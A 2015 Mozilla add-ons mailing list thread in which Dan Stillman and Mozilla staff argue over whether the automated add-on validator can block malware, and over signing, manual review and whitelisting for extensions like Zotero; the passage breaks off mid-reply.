Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

AMO Validator Bypass: a call for sanity

721 views
Skip to first unread message

Dan Stillman

unread,
Nov 24, 2015, 10:07:56 PM11/24/15
to mozilla-addons-...@lists.mozilla.org, amc...@mozilla.com, k...@mozilla.com
So Jorge just decided that the best way to respond to my trivial
validator-bypassing proof-of-concept [1] — a skeleton extension on
GitHub with three tiny examples of unblockable code patterns, hard-coded
to localhost — was to add it to the Firefox blocklist:

https://bugzilla.mozilla.org/show_bug.cgi?id=1227605

Yes, that’s right — you can no longer distribute an extension with the
id of amo-valida...@example.com. But you can still do everything
that it does and have your extension automatically signed, and there’s
no way that the current system can prevent that.

Can someone please step in and restore some sanity here?

In my post I provide concrete suggestions for meaningfully improving the
current system from the current useless/dangerous one. I'm happy to
discuss them further. But this is well past being an embarrassment to
Mozilla.

FYI, my post has been on Hacker News and is currently on the front pages
of r/linux and r/technology on Reddit, and it's been viewed thousands of
times today. This is now happening in public.

[1]
http://danstillman.com/2015/11/23/firefox-extension-scanning-is-security-theater

Emiliano Heyns

unread,
Nov 25, 2015, 5:37:24 AM11/25/15
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> So Jorge just decided that the best way to respond to my trivial
> validator-bypassing proof-of-concept [1] -- a skeleton extension on
> GitHub with three tiny examples of unblockable code patterns, hard-coded
> to localhost -- was to add it to the Firefox blocklist:
>
> https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
>
> Yes, that's right -- you can no longer distribute an extension with the
> id of amo-valida...@example.com. But you can still do everything
> that it does and have your extension automatically signed, and there's
> no way that the current system can prevent that.

What's the point in that? No one is going to install this (there isn't even an XPI to install), and this block just blocks that one specific, freely-choosable ID (right?). A three-liner script could pump out a thousand variants per minute all with unique IDs. Am I missing something here?

Tyler Downer

unread,
Nov 25, 2015, 9:04:07 AM11/25/15
to Emiliano Heyns, mozilla-addons-...@lists.mozilla.org
So, I haven't chimed in on this conversation yet, mainly because I'm far
too busy with other work, and this mailing list has gone rather circular at
times, but I do feel like we should clear the air here.

As far as I know, there was never any claim that the extension validator
would be a foolproof way to keep all malicious add-ons out. This would be
an impossible task, one that entire companies are dedicated to doing and
can't even succeed 100% of the time (See anti-virus and anti-malware
scanners). The validator is there to check for *common* issues that we see
in many add-ons, to try and catch some of the low hanging fruit. We will
also work on hardening and improving it as Firefox and the malware scene
changes (https://bugzilla.mozilla.org/show_bug.cgi?id=1227867). Mozilla is
not an anti-malware company however, nor are we trying to be.

Second, I don't believe we have ever denied "that signing gives you
enforcement of add-on ids, a record of deployed code, and a mechanism for
combating malicious side-loaded extensions, which were the primary target
of this scheme to begin with." as you say. The add-on validator and the
add-on signing system work in conjunction to provide a safer ecosystem.
Yes, add-ons will slip through the validator, but combined with signing, we
are providing a safer system for our users.

On Wed, Nov 25, 2015 at 3:37 AM, Emiliano Heyns <
emilian...@iris-advies.com> wrote:

> On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> > So Jorge just decided that the best way to respond to my trivial
> > validator-bypassing proof-of-concept [1] -- a skeleton extension on
> > GitHub with three tiny examples of unblockable code patterns, hard-coded
> > to localhost -- was to add it to the Firefox blocklist:
> >
> > https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
> >
> > Yes, that's right -- you can no longer distribute an extension with the
> > id of amo-valida...@example.com. But you can still do everything
> > that it does and have your extension automatically signed, and there's
> > no way that the current system can prevent that.
>
> What's the point in that? No one is going to install this (there isn't
> even an XPI to install), and this block just blocks that one specific,
> freely-choosable ID (right?). A three-liner script could pump out a
> thousand variants per minute all with unique IDs. Am I missing something
> here?
> _______________________________________________
> addons-user-experience mailing list
> addons-user...@lists.mozilla.org
> https://lists.mozilla.org/listinfo/addons-user-experience
>



--
Tyler Downer
Project Manager, User Advocacy

Kaply Consulting

unread,
Nov 25, 2015, 10:17:30 AM11/25/15
to Tyler Downer, Emiliano Heyns, mozilla-addons-...@lists.mozilla.org
If the validator causes malware developers to simply get more creative with
their Javascript, how does that make users safer?

Especially if these add-ons are signed automatically?

It's trivial to bypass the validator and have your add-on signed.

Even the author of the new validator admits that -
https://blog.mozilla.org/addons/2015/11/25/a-new-firefox-add-ons-validator/comment-page-1/#comment-220442
.

It's a linter, not a validator.

If we required add-on developer to obtain their own certificate, it would
be more secure because then there would at least be an identity piece. As
it stands, anyone can use any email address to sign up for AMO.

Mike




On Wed, Nov 25, 2015 at 8:04 AM, Tyler Downer <tdo...@mozilla.com> wrote:

> So, I haven't chimed in on this conversation yet, mainly because I'm far
> too busy with other work, and this mailing list has gone rather circular at
> times, but I do feel like we should clear the air here.
>
> As far as I know, there was never any claim that the extension validator
> would be a foolproof way to keep all malicious add-ons out. This would be
> an impossible task, one that entire companies are dedicated to doing and
> can't even succeed 100% of the time (See anti-virus and anti-malware
> scanners). The validator is there to check for *common* issues that we see
> in many add-ons, to try and catch some of the low hanging fruit. We will
> also work on hardening and improving it as Firefox and the malware scene
> changes (https://bugzilla.mozilla.org/show_bug.cgi?id=1227867). Mozilla is
> not an anti-malware company however, nor are we trying to be.
>
> Second, I don't believe we have ever denied "that signing gives you
> enforcement of add-on ids, a record of deployed code, and a mechanism for
> combating malicious side-loaded extensions, which were the primary target
> of this scheme to begin with." as you say. The add-on validator and the
> add-on signing system work in conjunction to provide a safer ecosystem.
> Yes, add-ons will slip through the validator, but combined with signing, we
> are providing a safer system for our users.
>
> On Wed, Nov 25, 2015 at 3:37 AM, Emiliano Heyns <
> emilian...@iris-advies.com> wrote:
>
> > On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> > > So Jorge just decided that the best way to respond to my trivial
> > > validator-bypassing proof-of-concept [1] -- a skeleton extension on
> > > GitHub with three tiny examples of unblockable code patterns,
> hard-coded
> > > to localhost -- was to add it to the Firefox blocklist:
> > >
> > > https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
> > >
> > > Yes, that's right -- you can no longer distribute an extension with the
> > > id of amo-valida...@example.com. But you can still do
> everything
> > > that it does and have your extension automatically signed, and there's
> > > no way that the current system can prevent that.
> >

Emiliano Heyns

unread,
Nov 25, 2015, 10:46:47 AM11/25/15
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 4:17:30 PM UTC+1, Kaply Consulting wrote:

> If the validator causes malware developers to simply get more creative with
> their Javascript, how does that make users safer?

Playing devil's advocate here, but forcing malware devs to get more creative *does* make users safer. It means you need more skillful people, and it would take more time.

The kind of creativity that Dan shows in his extension however (sorry Dan) isn't exactly rockstar developer stuff. It's something anyone with more than a passing knowledge of javascript would have immediately found the first time the validator would nuh-uh it.

> Especially if these add-ons are signed automatically?
>
> It's trivial to bypass the validator and have your add-on signed.

And therein lies the rub. Anyone could use these methods to get absolutely anything auto-signed -- including Zotero. Zotero is unlikely to do this because their extension ID would immediately be banned, and that would make upgrades and stuff impossible. So they're not going to want to do that.

If you don't mind throwaway IDs/email addresses however (like, e.g. malware authors), you don't have to care about one specific account/extension ID being banned. You can just churn out new ones and have those autosigned.

Dan mentioned putting the initial version (for a given extension ID) through manual review, and whitelist after that. That alone should stop ID churning dead in its tracks. So here the signature, combined with process, *would* actually help. Doesn't fix the case where (as has so often hinted, but never shown) existing extensions go rogue, no. But if you wanted to go rogue, you spend (if your extension is big and complicated) a few days on passing automated validation. If you want to go rogue, you can already do that, and Mozilla will even add a nice "seen by mozilla!" sign on it to put the users' mind at rest.

> If we required add-on developer to obtain their own certificate, it would
> be more secure because then there would at least be an identity piece. As
> it stands, anyone can use any email address to sign up for AMO.

Or something like like [this](http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity/), [this](http://convergence.io/) or [this](http://tack.io/). Forget about the goofy handle; Moxie Marlinspike knows his stuff when it comes to threat models and security.

Dan Stillman

unread,
Nov 25, 2015, 1:42:55 PM11/25/15
to mozilla-addons-...@lists.mozilla.org
Just in case you thought this couldn't get more absurd, Tyler Downer is
now attempting to discredit me on Reddit [1] by telling people that
Zotero submits "unnecessary code changes that slow up review times" (a
claim that I've never even seen made before) and that I didn't give the
full story (despite my linking to and giving context for the exact same
thread he links to in my post).

You guys are out of control.

[1]
https://www.reddit.com/r/firefox/comments/3u8cbe/automated_scanning_of_firefox_extensions_is/cxcrsg3

Emiliano Heyns

unread,
Nov 25, 2015, 4:09:15 PM11/25/15
to mozilla-addons-...@lists.mozilla.org
So the claim is now that Zotero is adding code that has no other purpose than to spite the AMO reviewers?

Wow. That is a hole new level of insanity.

Mike Connor

unread,
Nov 25, 2015, 4:22:03 PM11/25/15
to Dan Stillman, mozilla-addons-...@lists.mozilla.org
Hi Dan,

I think people on both sides have unnecessarily escalated this situation.
I'd also like to restore some sanity, and to that end I'd like to clarify
some points that I suspect have been confused or missed entirely:

1) Mozilla's position is not now, nor has it ever been, that the validator
represents a panacea for malware. It's a useful tool for catching common
bad patterns, and there's tons of room for improvement, but it'd be absurd
to claim 100% protection is possible.

2) One of the biggest wins from having all add-ons signed by Mozilla is
that we can effectively block bad add-ons (including variants submitted
from different accounts), which can't be said for the current system. This
is because add-ons can't self-modify or masquerade as common add-ons. (Or,
perhaps worse, be malicious forks of otherwise legitimate add-ons.) I
don't think it makes sense to completely ignore this factor in assessing
the overall security impact of signing.

3) It seems like a significant misrepresentation to claim that anyone's
said Zotero "will either turn rogue or become an attack vector" if you are
whitelisted. It's an extremely unlikely situation, as I've tried to take
pains to note. That said, humans make errors in judgement, and we'd be
foolish to ignore the possibility in drafting an official whitelisting
policy. My primary goal on whitelisting has been to ensure we have a fair
policy for all affected developers that incorporates clear resolutions to
all possible situations.

Big picture, we're not going to find common ground if we aren't even on the
same page about what and why we're doing things.

-- Mike


On Wed, Nov 25, 2015 at 1:42 PM, Dan Stillman <dsti...@zotero.org> wrote:

> Just in case you thought this couldn't get more absurd, Tyler Downer is
> now attempting to discredit me on Reddit [1] by telling people that Zotero
> submits "unnecessary code changes that slow up review times" (a claim that
> I've never even seen made before) and that I didn't give the full story
> (despite my linking to and giving context for the exact same thread he
> links to in my post).
>
> You guys are out of control.
>
> [1]
> https://www.reddit.com/r/firefox/comments/3u8cbe/automated_scanning_of_firefox_extensions_is/cxcrsg3
>

Dan Stillman

unread,
Nov 25, 2015, 5:19:46 PM11/25/15
to mozilla-addons-...@lists.mozilla.org
On 11/25/15 4:21 PM, Mike Connor wrote:
> 1) Mozilla's position is not now, nor has it ever been, that the
> validator represents a panacea for malware. It's a useful tool for
> catching common bad patterns, and there's tons of room for
> improvement, but it'd be absurd to claim 100% protection is possible.

Let's please not rewrite history.

As I note in my post, it was Jorge who said the scanner could "block the
majority of malware" when I first raised these concerns 9 months ago.
You've repeatedly said throughout this discussion that automated
scanning provides meaningful protections against malware, and that
whitelisted extensions are therefore inherently more dangerous.

Both of those claims are false in light of the code examples I've
provided. If you don't believe me, believe your colleagues:

"There is simply no way to detect malicious code like this in a dynamic
language like JS through static analysis of the source code." [1]

There is a trivial path to getting eval() through the automated scanner
for anyone with a basic knowledge of JavaScript. That can't be
prevented. All other policy decisions need to stem from that reality,
and it's a reality that the people defending this system either don't
understand or are still refusing to acknowledge because they don't want
to admit that they've been defending a broken system.

> 2) One of the biggest wins from having all add-ons signed by Mozilla
> is that we can effectively block bad add-ons (including variants
> submitted from different accounts), which can't be said for the
> current system. This is because add-ons can't self-modify or
> masquerade as common add-ons. (Or, perhaps worse, be malicious forks
> of otherwise legitimate add-ons.) I don't think it makes sense to
> completely ignore this factor in assessing the overall security impact
> of signing.

I'm not sure whom you're addressing with this. I defend code signing in
my post, and give concrete suggestions for building off of the actual
protections that code signing itself provides. But as currently
implemented, the system only impedes legitimate developers, while
providing no meaningful protections against malware and in fact
endangering users by providing a false sense of security.

> 3) It seems like a significant misrepresentation to claim that
> anyone's said Zotero "will either turn rogue or become an attack
> vector" if you are whitelisted. It's an extremely unlikely situation,
> as I've tried to take pains to note. That said, humans make errors in
> judgement, and we'd be foolish to ignore the possibility in drafting
> an official whitelisting policy. My primary goal on whitelisting has
> been to ensure we have a fair policy for all affected developers that
> incorporates clear resolutions to all possible situations.

It's been repeatedly suggested on this list that those were significant
possibilities.

But you're still not understanding. If Zotero or any other extension is
compromised, the attacker will simply submit an extension that bypasses
the automated scanner, which by definition, and as your own colleagues
attest, cannot be prevented. The only change with whitelisting is that
behaviors that no attempt was made to hide would be allowed through.
There are no additional protections.

> Big picture, we're not going to find common ground if we aren't even
> on the same page about what and why we're doing things.

Right, and my point is that the people defending the system don't
understand the technical issues here well enough to do so.

Fortunately this is being followed up in other channels, so I don't
think we really need to spend more time on it here.

- Dan


[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1227867

tyar...@gmail.com

unread,
Nov 25, 2015, 5:22:12 PM11/25/15
to mozilla-addons-...@lists.mozilla.org
1) > It's a useful tool for catching common
bad patterns, and there's tons of room for improvement, but it'd be absurd
to claim 100% protection is possible.

Dan has not made any claim such as this. His claim is that it should not be trivial to bypass the validator. Does this imply "100% protection" to you?

You won't find common ground by positing strawmen.

If it's a useful tool to catch bad patterns and it's trivial to use different bad patterns that won't be caught then it's not a useful tool.


2) Dan already knows this. From his advice:

> Stop pretending you can meaningfully combat malware via automated scanning. Accept that signing gives you enforcement of add-on ids, a record of deployed code, and a mechanism for combating malicious side-loaded extensions, which were the primary target of this scheme to begin with. These are all meaningful improvements from the pre-signing era.

You won't find common ground by restating established points as if they're new revelations.

tyar...@gmail.com

unread,
Nov 25, 2015, 5:22:47 PM11/25/15
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 2:22:03 PM UTC-7, Mike Connor wrote:
Then why not ask for evidence that this has been suggested to Dan by those from Mozilla instead of implying that he is purposely or recklessly misrepresenting them?

You won't find common ground attacking Dan's credibility without basis.

Mike Connor

unread,
Nov 25, 2015, 9:59:21 PM11/25/15
to Dan Stillman, addons-user...@lists.mozilla.org
On Wed, Nov 25, 2015 at 5:18 PM, Dan Stillman <dsti...@zotero.org> wrote:

> On 11/25/15 4:21 PM, Mike Connor wrote:
>
>> 1) Mozilla's position is not now, nor has it ever been, that the
>> validator represents a panacea for malware. It's a useful tool for catching
>> common bad patterns, and there's tons of room for improvement, but it'd be
>> absurd to claim 100% protection is possible.
>>
>
> Let's please not rewrite history.
>
> As I note in my post, it was Jorge who said the scanner could "block the
> majority of malware" when I first raised these concerns 9 months ago.


I think it's a substantial stretch to take that statement, without context,
and interpret it into scanning being a panacea or 100% reliable.


> You've repeatedly said throughout this discussion that automated scanning
> provides meaningful protections against malware, and that whitelisted
> extensions are therefore inherently more dangerous.
>

My assumption has always been that we'd need to do something beyond static
analysis to stop the smart bad guys. If I've failed to communicate that
assumption, my bad. (We've had some interesting conversations with a
potential partner who's already doing runtime analysis of add-ons, but the
tech is proprietary, so that's been slow.) That said, there's a lot of
lazy, unskilled "hackers" out there.

And yes, in the magical future world where automated scanning catches bad
actors a whitelisted add-on would be an attractive target. I don't think
that's a bad assumption.

2) One of the biggest wins from having all add-ons signed by Mozilla is
>> that we can effectively block bad add-ons (including variants submitted
>> from different accounts), which can't be said for the current system. This
>> is because add-ons can't self-modify or masquerade as common add-ons. (Or,
>> perhaps worse, be malicious forks of otherwise legitimate add-ons.) I
>> don't think it makes sense to completely ignore this factor in assessing
>> the overall security impact of signing.
>>
>
> I'm not sure whom you're addressing with this.



> I defend code signing in my post, and give concrete suggestions for
> building off of the actual protections that code signing itself provides.
> But as currently implemented, the system only impedes legitimate
> developers, while providing no meaningful protections against malware and
> in fact endangering users by providing a false sense of security.


Read your own point one. That's more or less the conversation we had over a
year ago, before we announced any of this publicly. That people believe we
can get an additional win from better automatic testing is entirely
orthogonal to whether the signing approach has other wins for combating
malware.

To assert that the system has no value (money quote: "only to end up with a
system that is utterly incapable of actually combating malware.") is where
this point comes in. There's real, effective wins from the current system,
and you're dismissing them entirely over what I assumed to be an additional
opportunity to raise the bar. That's a huge disconnect.

3) It seems like a significant misrepresentation to claim that anyone's
>> said Zotero "will either turn rogue or become an attack vector" if you are
>> whitelisted. It's an extremely unlikely situation, as I've tried to take
>> pains to note. That said, humans make errors in judgement, and we'd be
>> foolish to ignore the possibility in drafting an official whitelisting
>> policy. My primary goal on whitelisting has been to ensure we have a fair
>> policy for all affected developers that incorporates clear resolutions to
>> all possible situations.
>>
>
> It's been repeatedly suggested on this list that those were significant
> possibilities.
>

Link/quote? Again, I've taken great care to note that however unlikely we
may believe something to be, it's something that a strong policy will cover
as a possibility. That's it, at least for my part, but maybe I missed
something absurd someone else said.

I don't know how many times I need to say that for you to believe me. I'd
sincerely like to collaborate, but I do react badly to an assumption of bad
faith.


> But you're still not understanding. If Zotero or any other extension is
> compromised, the attacker will simply submit an extension that bypasses the
> automated scanner, which by definition, and as your own colleagues attest,
> cannot be prevented. The only change with whitelisting is that behaviors
> that no attempt was made to hide would be allowed through. There are no
> additional protections.


If we intend to rely solely on static analysis, yes. Again, my assumption
was that scanning was an initial step, and we would need to do much more
over time. I thought that was obvious enough that I didn't need to expand
the definition every time. Sadly not the case.

Big picture, we're not going to find common ground if we aren't even on the
>> same page about what and why we're doing things.
>>
>
> Right, and my point is that the people defending the system don't
> understand the technical issues here well enough to do so.


I'm not sure if that's directed at me, but oh well.

-- Mike

Dan Stillman

unread,
Nov 26, 2015, 1:25:47 AM11/26/15
to addons-user...@lists.mozilla.org
On 11/25/15 9:59 PM, Mike Connor wrote:
> On Wed, Nov 25, 2015 at 5:18 PM, Dan Stillman <dsti...@zotero.org
> <mailto:dsti...@zotero.org>> wrote:
>
> On 11/25/15 4:21 PM, Mike Connor wrote:
>
> 1) Mozilla's position is not now, nor has it ever been, that
> the validator represents a panacea for malware. It's a useful
> tool for catching common bad patterns, and there's tons of
> room for improvement, but it'd be absurd to claim 100%
> protection is possible.
>
>
> Let's please not rewrite history.
>
> As I note in my post, it was Jorge who said the scanner could
> "block the majority of malware" when I first raised these concerns
> 9 months ago.
>
>
> I think it's a substantial stretch to take that statement, without
> context, and interpret it into scanning being a panacea or 100% reliable.

Huh? "Panacea" and "100% protection" were your words. Here's what Jorge
said, when I asked about this sort of trivial string concatentation: "We
believe we can refine our detection system so we can block the majority
of malware, but it will never be perfect." [1]

That has been his underlying assumption throughout this entire process,
and it's simply not true. You can't block even the most trivial efforts
at obfuscation. Based on his blocklisting of the PoC id and his comments
on the hardening bug [2], it's not clear to me that Jorge understands
that even now. Which is OK — I don't mean that as a personal attack.
He's been operating under bad info. But it calls into question most of
the policy arguments he's made on this subject in the last year. You
can't make good policy without understanding just how little the
automated scanner can actually do.

Even the developer of the validator, asking a month ago whether
combating this sort of trivial obfuscation was possible (it's not, as he
was told), said, "Without it the validator remains more an
advisory/helpful tool than something we could use to automate security
validation." [3]

> You've repeatedly said throughout this discussion that automated
> scanning provides meaningful protections against malware, and that
> whitelisted extensions are therefore inherently more dangerous.
>
>
> My assumption has always been that we'd need to do something beyond
> static analysis to stop the smart bad guys. If I've failed to
> communicate that assumption, my bad.

The smart bad guys who can concatenate two strings?

Anyhow, if you've shared that assumption, I have not seen it. Certainly
nobody else has been talking about that. We've been talking about the
automated scanner and manual review.

> (We've had some interesting conversations with a potential partner
> who's already doing runtime analysis of add-ons, but the tech is
> proprietary, so that's been slow.)

Runtime analysis...which has no bearing on a discussion about an
automated scanner and manual review?

> That said, there's a lot of lazy, unskilled "hackers" out there.

Right, so again, you're advocating putting in place a system that's
massively disruptive to legitimate developers in order to combat
"hackers" who can't concatenate two strings, or read an HTTP header and
issue an XHR. And since you're saying it's potentially grounds for
denying whitelist status to an extension like Zotero, those are also the
people who would have purchased Zotero from George Mason University,
taken over Zotero development, compromised the Zotero servers,
compromised our VCS, snuck code past our review process, or any of the
other nightmare scenarios that have been offered.

> And yes, in the magical future world where automated scanning catches
> bad actors a whitelisted add-on would be an attractive target. I
> don't think that's a bad assumption.

I'm sorry, are you now saying that for the last three months you've been
arguing not about the scanning system that everyone else is talking
about but a magical future system that can catch someone who doesn't
want to be manually reviewed, which no one else weighing in on my post,
including other Mozilla engineers, seems to think is possible?

> I defend code signing in my post, and give concrete suggestions
> for building off of the actual protections that code signing
> itself provides. But as currently implemented, the system only
> impedes legitimate developers, while providing no meaningful
> protections against malware and in fact endangering users by
> providing a false sense of security.
>
>
> Read your own point one. That's more or less the conversation we had
> over a year ago, before we announced any of this publicly. That
> people believe we can get an additional win from better automatic
> testing is entirely orthogonal to whether the signing approach has
> other wins for combating malware.
>
> To assert that the system has no value (money quote: "only to end up
> with a system that is utterly incapable of actually combating
> malware.") is where this point comes in. There's real, effective wins
> from the current system, and you're dismissing them entirely over what
> I assumed to be an additional opportunity to raise the bar. That's a
> huge disconnect.

Yes, it is not capable of combating malware by anyone who 1) has the
slightest bit of JS knowledge and 2) does not want to be detected. Jorge
wasn't aware of that, but hopefully now is, after several Mozilla
engineers have explained it. The developer of the validator acknowledges
it, after Mozilla engineers confirmed it to him (and he's now calling it
a "linter" rather than a "validator"). You seem to still be disputing it.

I'm glad we agree on my point 1. It's point 2 — the parts of the system
that block legitimate developers from releasing extensions without
manual review — that this entire discussion has been about.

You've referred repeatedly to the need to balance user safety and
developer freedom. My PoC demonstrates that the scanner provides
essentially no user safety, because anyone who wants to can bypass it. I
hope by now everyone is clear on the costs it imposes on developers and
their users. You can keep arguing that those costs are worth it, but it
doesn't seem like many people are going to agree with you in light of
what I've shown.

In point 2 I suggest alterations that could be made to the new plan to
both meaningfully increase user safety and avoid the serious drawbacks
of the current plan in light of its sheer ineffectiveness.

> 3) It seems like a significant misrepresentation to claim that
> anyone's said Zotero "will either turn rogue or become an
> attack vector" if you are whitelisted. It's an extremely
> unlikely situation, as I've tried to take pains to note. That
> said, humans make errors in judgement, and we'd be foolish to
> ignore the possibility in drafting an official whitelisting
> policy. My primary goal on whitelisting has been to ensure we
> have a fair policy for all affected developers that
> incorporates clear resolutions to all possible situations.
>
>
> It's been repeatedly suggested on this list that those were
> significant possibilities.
>
>
> Link/quote? Again, I've taken great care to note that however unlikely
> we may believe something to be, it's something that a strong policy
> will cover as a possibility. That's it, at least for my part, but
> maybe I missed something absurd someone else said.
>
> I don't know how many times I need to say that for you to believe me.
> I'd sincerely like to collaborate, but I do react badly to an
> assumption of bad faith.

See the "nightmare scenarios" I list above. I'm not going to go find all
the threads, but I believe you've said most or all of those, except for
sneaking-code-past-Zotero-reviewers (which was Jorge). Jorge said some
of the same things. He also said that whitelisting "leads to code
getting significantly worse over time because there's no external party
reviewing it", including, in many cases, "exploitable security holes"
[4], and you backed him up on that, ignoring the fact that Zotero has in
effect been whitelisted for the last decade without that happening.

The issue isn't that you've suggested these as possibilities. It's that,
rather than evaluating the likelihood of them in Zotero's specific case
(e.g., the likelihood of Zotero being sold for malware) or weighing our
proven history of security against the risks, you've used them as
blanket reasons to not even commit to whitelisting Zotero under any
reasonable system. And you've done so in defense of a system that
everyone can now plainly see does essentially nothing to prevent
malware, because an attacker of any extension, whitelisted or not, can
get any code they want past the validator.
>
> But you're still not understanding. If Zotero or any other
> extension is compromised, the attacker will simply submit an
> extension that bypasses the automated scanner, which by
> definition, and as your own colleagues attest, cannot be
> prevented. The only change with whitelisting is that behaviors
> that no attempt was made to hide would be allowed through. There
> are no additional protections.
>
>
> If we intend to rely solely on static analysis, yes. Again, my
> assumption was that scanning was an initial step, and we would need to
> do much more over time. I thought that was obvious enough that I
> didn't need to expand the definition every time. Sadly not the case.

I don't know what "much more" you're referring to. Everyone else has
been talking about automated scanning, which provides essentially no
protections against malicious code, as all the engineers on the
hardening bug agree [2], and fallback manual review, which causes all
the problems for developers we've been discussing. But if the entire
dialogue with you has been one big misunderstanding, that's great.

- Dan

[1]
https://groups.google.com/d/msg/mozilla.addons.user-experience/slaKs943n4c/2nUqKsV9jgAJ
[2] https://bugzilla.mozilla.org/show_bug.cgi?id=1227867
[3]
https://groups.google.com/d/topic/mozilla.dev.static-analysis/qTCBKh2bRsE/discussion
[4]
https://groups.google.com/d/msg/mozilla.addons.user-experience/3bAaITHf1Xo/-phOBbI5AwAJ

Mike Connor

unread,
Nov 26, 2015, 2:16:27 PM11/26/15
to Dan Stillman, addons-user...@lists.mozilla.org
On Thu, Nov 26, 2015 at 1:25 AM, Dan Stillman <dsti...@zotero.org> wrote:

>
> Huh? "Panacea" and "100% protection" were your words. Here's what Jorge
> said, when I asked about this sort of trivial string concatentation: "We
> believe we can refine our detection system so we can block the majority of
> malware, but it will never be perfect." [1]
>

So, here's the entire disconnect: you're claiming we're actually
endangering end users, based seemingly on that statement. I think that's...
deeply broken.

To me, a claim that we're endangering users with a false sense of security
means we've made a claim to those users about more effective end user
security for this class of add-ons (including through our UI). I don't
think we've made that claim (and our UI doesn't either, last I looked).

(We've had some interesting conversations with a potential partner who's
>> already doing runtime analysis of add-ons, but the tech is proprietary, so
>> that's been slow.)
>>
>
> Runtime analysis...which has no bearing on a discussion about an automated
> scanner and manual review?


The goal was to integrate directly with their tech via a web service. In
more or less real time.


> And yes, in the magical future world where automated scanning catches bad
>> actors a whitelisted add-on would be an attractive target. I don't think
>> that's a bad assumption.
>>
>
> I'm sorry, are you now saying that for the last three months you've been
> arguing not about the scanning system that everyone else is talking about
> but a magical future system that can catch someone who doesn't want to be
> manually reviewed, which no one else weighing in on my post, including
> other Mozilla engineers, seems to think is possible?


Yes, I've been operating for the last year or so under the assumption that
any meaningful automated scanning in the long term would require tech that
isn't static analysis.

(I have an unfortunate tendency toward assuming shared/equal context, and
glossing over the details. Especially on things I've known for a long
time. Aspie brain sucks.)

Yes, it is not capable of combating malware by anyone who 1) has the
> slightest bit of JS knowledge and 2) does not want to be detected.


Signing, as you note repeatedly, gives us real tools to combat malware,
especially side-loaded malware. It's important that we distinguish the
two. However, you don't just attack the scanner, you're attacking the
entire system. [1]

In point 2 I suggest alterations that could be made to the new plan to both
> meaningfully increase user safety and avoid the serious drawbacks of the
> current plan in light of its sheer ineffectiveness.


The roadblock of an initial review is smart, but potentially wouldn't scale
well.

ignoring the fact that Zotero has in effect been whitelisted for the last
>> decade without that happening.
>>
>
"It hasn't happened before, so it won't happen in the future."

The issue isn't that you've suggested these as possibilities.


That's really not true, IMO. You've reacted aggressively and dismissively
to any statement that suggests we can't simply assume Zotero will never go
bad. It could happen. Will it happen? Almost certainly not. But it'd be
naive to not ensure the general policy has a remediation step if that
unlikely event happens.

Again, and I keep saying this: I'm not worried about Zotero in particular,
I just don't want Zotero's example to be the justification for a poorly
conceived policy. (Or worse, an arbitrary set of exceptions.) I don't
think that's an unfair position.

I don't know what "much more" you're referring to. Everyone else has been
> talking about automated scanning, which provides essentially no
> protections against malicious code, as all the engineers on the hardening
> bug agree [2],


"Better than glorified regexps"


> and fallback manual review, which causes all the problems for developers
> we've been discussing. But if the entire dialogue with you has been one big
> misunderstanding, that's great.
>

I'd say at least 85%. :)

-- Mike

[1] "And it’s just depressing that the entire Mozilla developer community
spent the last year debating extension signing and having every single
counterargument be dismissed only to end up with a system that is utterly

Dan Stillman

unread,
Nov 27, 2015, 4:19:55 AM11/27/15
to addons-user...@lists.mozilla.org
On 11/26/15 2:16 PM, Mike Connor wrote:
> On Thu, Nov 26, 2015 at 1:25 AM, Dan Stillman <dsti...@zotero.org
> <mailto:dsti...@zotero.org>> wrote:
>
>
> Huh? "Panacea" and "100% protection" were your words. Here's what
> Jorge said, when I asked about this sort of trivial string
> concatentation: "We believe we can refine our detection system so
> we can block the majority of malware, but it will never be
> perfect." [1]
>
>
> So, here's the entire disconnect: you're claiming we're actually
> endangering end users, based seemingly on that statement. I think
> that's... deeply broken.
>
> To me, a claim that we're endangering users with a false sense of
> security means we've made a claim to those users about more effective
> end user security for this class of add-ons (including through our
> UI). I don't think we've made that claim (and our UI doesn't either,
> last I looked).

If you can't acknowledge that "we can block the majority of malware"
(February) and "adequate validation should filter out the majority of
malware" (yesterday) are incorrect statements made by someone not aware
of the relevant technical issues, we're not going to get anywhere.

It's good that the UI hasn't changed — I checked that before I wrote my
post. (For what it's worth, the original blog post did say "Extensions
that meet the full review standard will have a smoother and friendlier
install experience, regardless of where they’re hosted." and show a
version of a less-scary installation UI. That appears to have been
wisely dropped.) But this has been a very public change, and all parts
of it — including the scanner — have been made and repeatedly defended
in the name of combating malware, including by you. Everyone can now see
that the automated scanner is not capable of stopping anyone who does
not want to be detected.

(Also, since we agree that a record of deployed code is valuable, we
hopefully also agree that having onerous but trivially bypassable rules
could result in less code available to search through or review after
the fact.)

Anyhow, the false sense of security produced by Mozilla's statements is
the least of my concerns — that was one line in my post, and describing
it as "the entire disconnect" seems a bit off-base. As you well know, my
primary concern, and the reason for my post, is the ability of Zotero
and other legitimate developers to continue unimpeded. You have said
over and over that your goal is to balance user safety and developer
freedom. You can no longer reasonably argue that the current system
achieves that balance, because, as many thousands of people have now
seen, automated scanning provides essentially no additional security,
while manual review is extremely disruptive to legitimate developers.

> (We've had some interesting conversations with a potential
> partner who's already doing runtime analysis of add-ons, but
> the tech is proprietary, so that's been slow.)
>
>
> Runtime analysis...which has no bearing on a discussion about an
> automated scanner and manual review?
>
>
> The goal was to integrate directly with their tech via a web service.
> In more or less real time.
>
> And yes, in the magical future world where automated scanning
> catches bad actors a whitelisted add-on would be an attractive
> target. I don't think that's a bad assumption.
>
>
> I'm sorry, are you now saying that for the last three months
> you've been arguing not about the scanning system that everyone
> else is talking about but a magical future system that can catch
> someone who doesn't want to be manually reviewed, which no one
> else weighing in on my post, including other Mozilla engineers,
> seems to think is possible?
>
>
> Yes, I've been operating for the last year or so under the assumption
> that any meaningful automated scanning in the long term would require
> tech that isn't static analysis.

OK, well, then this was indeed a misunderstanding. No one else has been
